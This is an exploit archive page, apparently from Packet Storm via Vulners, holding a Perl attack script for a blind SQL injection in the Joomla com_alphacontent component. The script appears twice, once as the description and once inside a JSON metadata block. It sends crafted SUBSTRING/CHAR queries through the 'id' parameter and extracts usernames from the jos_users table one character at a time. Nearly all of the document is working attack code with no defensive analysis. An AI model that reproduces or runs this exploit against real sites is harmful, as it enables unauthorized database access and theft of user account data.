Search...

joomlaalpha-blindsql.txt

2008-04-28T00:00:00

ID PACKETSTORM:65877
Type packetstorm
Reporter Inphex
Modified 2008-04-28T00:00:00

Description

                                        
                                            `#!/usr/bin/perl  
#eSploit Framework - Inphex  
use Digest::MD5 qw(md5 md5_hex md5_base64);  
use LWP::UserAgent;  
use HTTP::Cookies;  
use Switch;  
$host_ = shift;  
$path_ = shift;  
$id_ = shift;  
$non_find = shift; #choose anything thats inside the article of id  
$column = "username"; #change if needet  
$table = "jos_users"; #change if needet  
print "usage: $0 http://host.com / 17 Following";  
$info{'info'} = {  
"author" =&gt; ["cO2,Inphex"],  
"name" =&gt; ["Joomla com_alphacontent Blind SQL Injection"],  
"version" =&gt; [],  
"description" =&gt; ["This Script will exploit a Blind SQL Injection vulnerability in com_alphacontent\n"],  
"options" =&gt;  
{  
"agent" =&gt; "",   
"proxy" =&gt; "",   
"default_headers" =&gt; [   
["key","value"]],  
"timeout" =&gt; 2,  
"cookie" =&gt;   
{  
"cookie" =&gt; ["key=value"],  
},  
},  
"sending_options" =&gt;  
{  
"host" =&gt; $host_,  
"path" =&gt; $path_."index.php",   
"port" =&gt; 80,   
"method_a" =&gt; "SQL_INJECTION_BLIND",   
"attack" =&gt;  
{  
"option" =&gt; ["get","option","com_alphacontent"],  
"section" =&gt; ["get","section","3"],  
"task" =&gt; ["get","task","view"],  
"cat" =&gt; ["get","cat","3"],  
"sql" =&gt; ["get","id","".$id_."%20AND%20SUBSTRING((SELECT%20".$column."%20FROM%20".$table."%20LIMIT%200,1),\$h,1)=CHAR(\$i)"],   
"regex" =&gt; [[$non_find]],  
},  
},  
};  
&start($info{'info'},222);  
sub start  
{  
$a_ = shift;  
$id = shift;  
$get_dA = get_d_p_s("get");  
$post_dA = get_d_p_s("post");  
my ($x,$c,$m,$h,$ff,$kf,$hp,$c,$cccc) = (0,0,0,0,0,0,0,0,0);  
my $jj = 1;  
my $ii = 48;  
my $hh = 1;  
my $ppp = 0;  
my $s = shift;  
my $a = "";  
my $res_p = "";  
my $h = "";  
($h_host_h_xdsjaop,$h_path_h_xdsjaop,$h_port_h_xdsjaop,$method_m) = ($a_-&gt;{'sending_options'}{'host'},$a_-&gt;{'sending_options'}{'path'},$a_-&gt;{'sending_options'}{'port'},$a_-&gt;{'sending_options'}{'method_a'});  
$ua = LWP::UserAgent-&gt;new;  
$ua-&gt;timeout($a_-&gt;{'options'}{'timeout'});   
if ($a_-&gt;{'options'}{'proxy'}) {  
$ua-&gt;proxy(['http', 'ftp'] =&gt; $a_-&gt;{'options'}{'proxy'});  
}  
$agent = $a_-&gt;{'options'}{'agent'} || "Mozilla/5.0";  
$ua-&gt;agent($agent);  
{   
while (($k,$v) = each(%{$a_}))  
{  
if ($k ne "options" && $k ne "sending_options")  
{  
foreach $r (@{$a_-&gt;{$k}})  
{  
if ($a_-&gt;{$k}[0])  
{  
print $k.":".$a_-&gt;{$k}[0]."\n";  
}  
}  
}  
}  
  
foreach $j (@{$a_-&gt;{'options'}{'default_headers'}})  
{   
$ua-&gt;default_headers-&gt;push_header($a_-&gt;{'options'}{'default_headers'}[$m][0] =&gt; $a_-&gt;{'options'}{'default_headers'}[$m][1]);  
$m++;  
}  
if ($a_-&gt;{'options'}{'cookie'}{'cookie'}[0])  
{   
$ua-&gt;default_headers-&gt;push_header('Cookie' =&gt; $a_-&gt;{'options'}{'cookie'}{'cookie'}[0]);  
}  
  
}  
switch ($method_m)   
{  
case "attack" { &attack();}  
case "SQL_INJECTION_BLIND" { &sql_injection_blind();}  
case "REMOTE_COMMAND_EXECUTION" { &attack();}  
case "REMOTE_CODE_EXECUTION" {&attack();}  
case "REMOTE_FILE_INCLUSION" { &attack();}  
case "LOCAL_FILE_INCLUSION" { &attack(); }  
else { &attack(); }   
}  
  
sub attack  
{  
  
if ($post_dA eq "") {  
$method = "get";  
} elsif ($post_dA ne "")  
{  
$method = "post";  
}  
if ($method eq "get") {   
$res_p = get_data($h_host_h_xdsjaop,$h_path_h_xdsjaop."?".$get_dA);  
${$a_}{$id}{'content'} = $res_p;  
foreach $a (@{$a_-&gt;{'sending_options'}{'attack'}{'regex'}})  
{  
$res_p =~ /$a_-&gt;{'sending_options'}{'attack'}{'regex'}[$h][0]/;  
  
while ($jj &lt;= $a_-&gt;{'sending_options'}{'attack'}{'regex'}[$h][1])  
{  
if (${$jj} ne "")  
{  
${$a_}{$id}{'regex'}[$h] = ${$jj};  
}  
$jj++;  
}  
$h++;  
}  
} elsif ($method eq "post")  
{  
$res_p = post_data($h_host_h_xdsjaop,$h_path_h_xdsjaop."?".$get_dA,"application/x-www-form-urlencoded",$post_dA);  
  
${$a_}{$id}{'content'} = $res_p;  
foreach $a (@{$a_-&gt;{'sending_options'}{'attack'}{'regex'}})  
{  
$res_p =~ /$a_-&gt;{'sending_options'}{'attack'}{'regex'}[$h][0]/;  
while ($jj &lt;= $a_-&gt;{'sending_options'}{'attack'}{'regex'}[$h][1])  
{  
if (${$jj} ne "")  
{  
${$a_}{$id}{'regex'}[$h] = ${$jj};  
}  
$jj++;  
}  
$h++;  
}  
}  
}  
sub sql_injection_blind  
{  
syswrite STDOUT,$column.":";  
while ()  
{  
while ($ii &lt;= 90)  
{  
if(check($ii,$hh) == 1)  
{  
syswrite STDOUT,lc(chr($ii));  
$hh++;  
$chr = $chr.chr($ii);  
}  
$ii++;  
}  
push(@ffs,length($chr));  
if (($#ffs -1) == $ffs)  
{  
print "\nFinished/Error\n";  
exit;  
}  
$ii = 48;  
}  
}  
sub check($$)  
{  
$ii = shift;  
$hh = shift;  
if (get_d_p_s("post") ne "")  
{  
$method = "post";  
} else { $method = "get";}  
if ($method eq "get")  
{  
$ppp++;  
$query = modify($get_dA,$ii,$hh);  
$res_p = get_data($h_host_h_xdsjaop,$a_-&gt;{'sending_options'}{'path'}."?".$query);  
foreach $a (@{$a_-&gt;{'sending_options'}{'attack'}{'regex'}})  
{  
if ($res_p =~m/$a_-&gt;{'sending_options'}{'attack'}{'regex'}[$h][0]/)  
{  
return 1;  
}  
else  
{  
return 0;  
}  
$h++;  
}  
} elsif ($method eq "post")  
{  
$ppp++;  
$query_g = modify($get_dA,$ii,$hh);  
$query_p = modify($post_dA,$ii,$hh);  
  
$res_p = post_data($h_host_h_xdsjaop,$a_-&gt;{'sending_options'}{'path'}."?".$query_g,"application/x-www-form-urlencoded",$query_p);  
foreach $a (@{$a_-&gt;{'sending_options'}{'attack'}{'regex'}})  
{  
if ($res_p =~m/$a_-&gt;{'sending_options'}{'attack'}{'regex'}[$h][0]/)  
{  
return 1;  
}  
else  
{  
return 0;  
}  
$h++;  
}  
}  
}  
sub modify($$$)  
{  
$string = shift;  
$replace_by = shift;  
$replace_by1 = shift;  
if ($string !~/\$i/ && $string !~/\$h/) {  
print $string;  
} elsif ($string !~/\$i/)  
{  
$ff = substr($string,0,index($string,"\$h"));  
$ee = substr($string,rindex($string,"\$h")+2);  
$string = $ff.$replace_by1.$ee;  
return $string;  
} elsif ($string !~/\$h/)  
{  
$f = substr($string,0,index($string,"\$i"));  
$e = substr($string,rindex($string,"\$i")+2);  
$string = $f.$replace_by.$e;  
return $string;  
} else  
{  
$f = substr($string,0,index($string,"\$i"));  
$e = substr($string,rindex($string,"\$i")+2);  
$string = $f.$replace_by.$e;  
$ff = substr($string,0,index($string,"\$h"));  
$ee = substr($string,rindex($string,"\$h")+2);  
$string = $ff.$replace_by1.$ee;  
return $string;  
}  
}  
sub get_d_p_s  
{  
$g_d_p_s = shift;  
$post_data = "";  
$get_data = "";  
$header_data = "";  
%header_dA = ();  
while (($k,$v) = each(%{$a_-&gt;{'sending_options'}{'attack'}}))  
{  
if ($a_-&gt;{'sending_options'}{'attack'}{$k}[0] =~ "get")  
{  
$method = "get"; push(@get,$a_-&gt;{'sending_options'}{'attack'}{$k}[1]."=".$a_-&gt;{'sending_options'}{'attack'}{$k}[2]);  
}  
elsif ($a_-&gt;{'sending_options'}{'attack'}{$k}[0] =~ "post")  
{  
$method = "post"; push(@post,$a_-&gt;{'sending_options'}{'attack'}{$k}[1]."=".$a_-&gt;{'sending_options'}{'attack'}{$k}[2]);  
}  
elsif ($a_-&gt;{'sending_options'}{'attack'}{$k}[0] =~ "header")  
{  
$header_dA{$a_-&gt;{'sending_options'}{'attack'}{$k}[1]} = $a_-&gt;{'sending_options'}{'attack'}{$k}[2];  
}  
$hp++;  
}  
$yy = $#get;  
while ($bb &lt;= $#get)  
{  
$get_data .= $get[$yy]."&";  
$bb++;  
$yy--;  
}  
$l = $#post;  
while ($k &lt;= $#post)  
{  
  
$post_data .= $post[$l]."&";  
$k++;  
$l--;  
}  
if ($g_d_p_s eq "get")  
{  
  
return $get_data;  
}  
elsif ($g_d_p_s eq "post")  
{  
return $post_data;  
} elsif ($g_d_p_s eq "header")  
{  
return %header_dA;  
}  
}  
sub get_data  
{  
$h_host_h_xdsjaop = shift;  
$h_path_h_xdsjaop = shift;  
%hash = get_d_p_s("header");  
while (($u,$c) = each(%hash))  
{  
$ua-&gt;default_headers-&gt;push_header($u =&gt; $c);  
}  
$req = $ua-&gt;get($h_host_h_xdsjaop.$h_path_h_xdsjaop);  
return $req-&gt;content;  
}  
sub post_data  
{  
$h_host_h_xdsjaop = shift;  
$h_path_h_xdsjaop = shift;  
$content_type = shift;  
$send = shift;  
%hash = get_d_p_s("header");  
while (($u,$c) = each(%hash))  
{  
$ua-&gt;default_headers-&gt;push_header($u =&gt; $c);  
}  
$req = HTTP::Request-&gt;new(POST =&gt; $h_host_h_xdsjaop.$h_path_h_xdsjaop);  
$req-&gt;content_type($content_type);  
$req-&gt;content($send);  
$res = $ua-&gt;request($req);  
return $res-&gt;content;  
}  
}  
  
`

JSON Vulners Source

Initial Source

{"id": "PACKETSTORM:65877", "type": "packetstorm", "bulletinFamily": "exploit", "title": "joomlaalpha-blindsql.txt", "description": "", "published": "2008-04-28T00:00:00", "modified": "2008-04-28T00:00:00", "cvss": {"vector": "NONE", "score": 0.0}, "href": "https://packetstormsecurity.com/files/65877/joomlaalpha-blindsql.txt.html", "reporter": "Inphex", "references": [], "cvelist": [], "lastseen": "2016-11-03T10:18:46", "viewCount": 1, "enchantments": {"score": {"value": -0.3, "vector": "NONE", "modified": "2016-11-03T10:18:46", "rev": 2}, "dependencies": {"references": [], "modified": "2016-11-03T10:18:46", "rev": 2}, "vulnersScore": -0.3}, "sourceHref": "https://packetstormsecurity.com/files/download/65877/joomlaalpha-blindsql.txt", "sourceData": "`#!/usr/bin/perl \n#eSploit Framework - Inphex \nuse Digest::MD5 qw(md5 md5_hex md5_base64); \nuse LWP::UserAgent; \nuse HTTP::Cookies; \nuse Switch; \n$host_ = shift; \n$path_ = shift; \n$id_ = shift; \n$non_find = shift; #choose anything thats inside the article of id \n$column = \"username\"; #change if needet \n$table = \"jos_users\"; #change if needet \nprint \"usage: $0 http://host.com / 17 Following\"; \n$info{'info'} = { \n\"author\" => [\"cO2,Inphex\"], \n\"name\" => [\"Joomla com_alphacontent Blind SQL Injection\"], \n\"version\" => [], \n\"description\" => [\"This Script will exploit a Blind SQL Injection vulnerability in com_alphacontent\\n\"], \n\"options\" => \n{ \n\"agent\" => \"\", \n\"proxy\" => \"\", \n\"default_headers\" => [ \n[\"key\",\"value\"]], \n\"timeout\" => 2, \n\"cookie\" => \n{ \n\"cookie\" => [\"key=value\"], \n}, \n}, \n\"sending_options\" => \n{ \n\"host\" => $host_, \n\"path\" => $path_.\"index.php\", \n\"port\" => 80, \n\"method_a\" => \"SQL_INJECTION_BLIND\", \n\"attack\" => \n{ \n\"option\" => [\"get\",\"option\",\"com_alphacontent\"], \n\"section\" => [\"get\",\"section\",\"3\"], \n\"task\" => [\"get\",\"task\",\"view\"], \n\"cat\" => [\"get\",\"cat\",\"3\"], \n\"sql\" => [\"get\",\"id\",\"\".$id_.\"%20AND%20SUBSTRING((SELECT%20\".$column.\"%20FROM%20\".$table.\"%20LIMIT%200,1),\\$h,1)=CHAR(\\$i)\"], \n\"regex\" => [[$non_find]], \n}, \n}, \n}; \n&start($info{'info'},222); \nsub start \n{ \n$a_ = shift; \n$id = shift; \n$get_dA = get_d_p_s(\"get\"); \n$post_dA = get_d_p_s(\"post\"); \nmy ($x,$c,$m,$h,$ff,$kf,$hp,$c,$cccc) = (0,0,0,0,0,0,0,0,0); \nmy $jj = 1; \nmy $ii = 48; \nmy $hh = 1; \nmy $ppp = 0; \nmy $s = shift; \nmy $a = \"\"; \nmy $res_p = \"\"; \nmy $h = \"\"; \n($h_host_h_xdsjaop,$h_path_h_xdsjaop,$h_port_h_xdsjaop,$method_m) = ($a_->{'sending_options'}{'host'},$a_->{'sending_options'}{'path'},$a_->{'sending_options'}{'port'},$a_->{'sending_options'}{'method_a'}); \n$ua = LWP::UserAgent->new; \n$ua->timeout($a_->{'options'}{'timeout'}); \nif ($a_->{'options'}{'proxy'}) { \n$ua->proxy(['http', 'ftp'] => $a_->{'options'}{'proxy'}); \n} \n$agent = $a_->{'options'}{'agent'} || \"Mozilla/5.0\"; \n$ua->agent($agent); \n{ \nwhile (($k,$v) = each(%{$a_})) \n{ \nif ($k ne \"options\" && $k ne \"sending_options\") \n{ \nforeach $r (@{$a_->{$k}}) \n{ \nif ($a_->{$k}[0]) \n{ \nprint $k.\":\".$a_->{$k}[0].\"\\n\"; \n} \n} \n} \n} \n \nforeach $j (@{$a_->{'options'}{'default_headers'}}) \n{ \n$ua->default_headers->push_header($a_->{'options'}{'default_headers'}[$m][0] => $a_->{'options'}{'default_headers'}[$m][1]); \n$m++; \n} \nif ($a_->{'options'}{'cookie'}{'cookie'}[0]) \n{ \n$ua->default_headers->push_header('Cookie' => $a_->{'options'}{'cookie'}{'cookie'}[0]); \n} \n \n} \nswitch ($method_m) \n{ \ncase \"attack\" { &attack();} \ncase \"SQL_INJECTION_BLIND\" { &sql_injection_blind();} \ncase \"REMOTE_COMMAND_EXECUTION\" { &attack();} \ncase \"REMOTE_CODE_EXECUTION\" {&attack();} \ncase \"REMOTE_FILE_INCLUSION\" { &attack();} \ncase \"LOCAL_FILE_INCLUSION\" { &attack(); } \nelse { &attack(); } \n} \n \nsub attack \n{ \n \nif ($post_dA eq \"\") { \n$method = \"get\"; \n} elsif ($post_dA ne \"\") \n{ \n$method = \"post\"; \n} \nif ($method eq \"get\") { \n$res_p = get_data($h_host_h_xdsjaop,$h_path_h_xdsjaop.\"?\".$get_dA); \n${$a_}{$id}{'content'} = $res_p; \nforeach $a (@{$a_->{'sending_options'}{'attack'}{'regex'}}) \n{ \n$res_p =~ /$a_->{'sending_options'}{'attack'}{'regex'}[$h][0]/; \n \nwhile ($jj <= $a_->{'sending_options'}{'attack'}{'regex'}[$h][1]) \n{ \nif (${$jj} ne \"\") \n{ \n${$a_}{$id}{'regex'}[$h] = ${$jj}; \n} \n$jj++; \n} \n$h++; \n} \n} elsif ($method eq \"post\") \n{ \n$res_p = post_data($h_host_h_xdsjaop,$h_path_h_xdsjaop.\"?\".$get_dA,\"application/x-www-form-urlencoded\",$post_dA); \n \n${$a_}{$id}{'content'} = $res_p; \nforeach $a (@{$a_->{'sending_options'}{'attack'}{'regex'}}) \n{ \n$res_p =~ /$a_->{'sending_options'}{'attack'}{'regex'}[$h][0]/; \nwhile ($jj <= $a_->{'sending_options'}{'attack'}{'regex'}[$h][1]) \n{ \nif (${$jj} ne \"\") \n{ \n${$a_}{$id}{'regex'}[$h] = ${$jj}; \n} \n$jj++; \n} \n$h++; \n} \n} \n} \nsub sql_injection_blind \n{ \nsyswrite STDOUT,$column.\":\"; \nwhile () \n{ \nwhile ($ii <= 90) \n{ \nif(check($ii,$hh) == 1) \n{ \nsyswrite STDOUT,lc(chr($ii)); \n$hh++; \n$chr = $chr.chr($ii); \n} \n$ii++; \n} \npush(@ffs,length($chr)); \nif (($#ffs -1) == $ffs) \n{ \nprint \"\\nFinished/Error\\n\"; \nexit; \n} \n$ii = 48; \n} \n} \nsub check($$) \n{ \n$ii = shift; \n$hh = shift; \nif (get_d_p_s(\"post\") ne \"\") \n{ \n$method = \"post\"; \n} else { $method = \"get\";} \nif ($method eq \"get\") \n{ \n$ppp++; \n$query = modify($get_dA,$ii,$hh); \n$res_p = get_data($h_host_h_xdsjaop,$a_->{'sending_options'}{'path'}.\"?\".$query); \nforeach $a (@{$a_->{'sending_options'}{'attack'}{'regex'}}) \n{ \nif ($res_p =~m/$a_->{'sending_options'}{'attack'}{'regex'}[$h][0]/) \n{ \nreturn 1; \n} \nelse \n{ \nreturn 0; \n} \n$h++; \n} \n} elsif ($method eq \"post\") \n{ \n$ppp++; \n$query_g = modify($get_dA,$ii,$hh); \n$query_p = modify($post_dA,$ii,$hh); \n \n$res_p = post_data($h_host_h_xdsjaop,$a_->{'sending_options'}{'path'}.\"?\".$query_g,\"application/x-www-form-urlencoded\",$query_p); \nforeach $a (@{$a_->{'sending_options'}{'attack'}{'regex'}}) \n{ \nif ($res_p =~m/$a_->{'sending_options'}{'attack'}{'regex'}[$h][0]/) \n{ \nreturn 1; \n} \nelse \n{ \nreturn 0; \n} \n$h++; \n} \n} \n} \nsub modify($$$) \n{ \n$string = shift; \n$replace_by = shift; \n$replace_by1 = shift; \nif ($string !~/\\$i/ && $string !~/\\$h/) { \nprint $string; \n} elsif ($string !~/\\$i/) \n{ \n$ff = substr($string,0,index($string,\"\\$h\")); \n$ee = substr($string,rindex($string,\"\\$h\")+2); \n$string = $ff.$replace_by1.$ee; \nreturn $string; \n} elsif ($string !~/\\$h/) \n{ \n$f = substr($string,0,index($string,\"\\$i\")); \n$e = substr($string,rindex($string,\"\\$i\")+2); \n$string = $f.$replace_by.$e; \nreturn $string; \n} else \n{ \n$f = substr($string,0,index($string,\"\\$i\")); \n$e = substr($string,rindex($string,\"\\$i\")+2); \n$string = $f.$replace_by.$e; \n$ff = substr($string,0,index($string,\"\\$h\")); \n$ee = substr($string,rindex($string,\"\\$h\")+2); \n$string = $ff.$replace_by1.$ee; \nreturn $string; \n} \n} \nsub get_d_p_s \n{ \n$g_d_p_s = shift; \n$post_data = \"\"; \n$get_data = \"\"; \n$header_data = \"\"; \n%header_dA = (); \nwhile (($k,$v) = each(%{$a_->{'sending_options'}{'attack'}})) \n{ \nif ($a_->{'sending_options'}{'attack'}{$k}[0] =~ \"get\") \n{ \n$method = \"get\"; push(@get,$a_->{'sending_options'}{'attack'}{$k}[1].\"=\".$a_->{'sending_options'}{'attack'}{$k}[2]); \n} \nelsif ($a_->{'sending_options'}{'attack'}{$k}[0] =~ \"post\") \n{ \n$method = \"post\"; push(@post,$a_->{'sending_options'}{'attack'}{$k}[1].\"=\".$a_->{'sending_options'}{'attack'}{$k}[2]); \n} \nelsif ($a_->{'sending_options'}{'attack'}{$k}[0] =~ \"header\") \n{ \n$header_dA{$a_->{'sending_options'}{'attack'}{$k}[1]} = $a_->{'sending_options'}{'attack'}{$k}[2]; \n} \n$hp++; \n} \n$yy = $#get; \nwhile ($bb <= $#get) \n{ \n$get_data .= $get[$yy].\"&\"; \n$bb++; \n$yy--; \n} \n$l = $#post; \nwhile ($k <= $#post) \n{ \n \n$post_data .= $post[$l].\"&\"; \n$k++; \n$l--; \n} \nif ($g_d_p_s eq \"get\") \n{ \n \nreturn $get_data; \n} \nelsif ($g_d_p_s eq \"post\") \n{ \nreturn $post_data; \n} elsif ($g_d_p_s eq \"header\") \n{ \nreturn %header_dA; \n} \n} \nsub get_data \n{ \n$h_host_h_xdsjaop = shift; \n$h_path_h_xdsjaop = shift; \n%hash = get_d_p_s(\"header\"); \nwhile (($u,$c) = each(%hash)) \n{ \n$ua->default_headers->push_header($u => $c); \n} \n$req = $ua->get($h_host_h_xdsjaop.$h_path_h_xdsjaop); \nreturn $req->content; \n} \nsub post_data \n{ \n$h_host_h_xdsjaop = shift; \n$h_path_h_xdsjaop = shift; \n$content_type = shift; \n$send = shift; \n%hash = get_d_p_s(\"header\"); \nwhile (($u,$c) = each(%hash)) \n{ \n$ua->default_headers->push_header($u => $c); \n} \n$req = HTTP::Request->new(POST => $h_host_h_xdsjaop.$h_path_h_xdsjaop); \n$req->content_type($content_type); \n$req->content($send); \n$res = $ua->request($req); \nreturn $res->content; \n} \n} \n \n`\n"}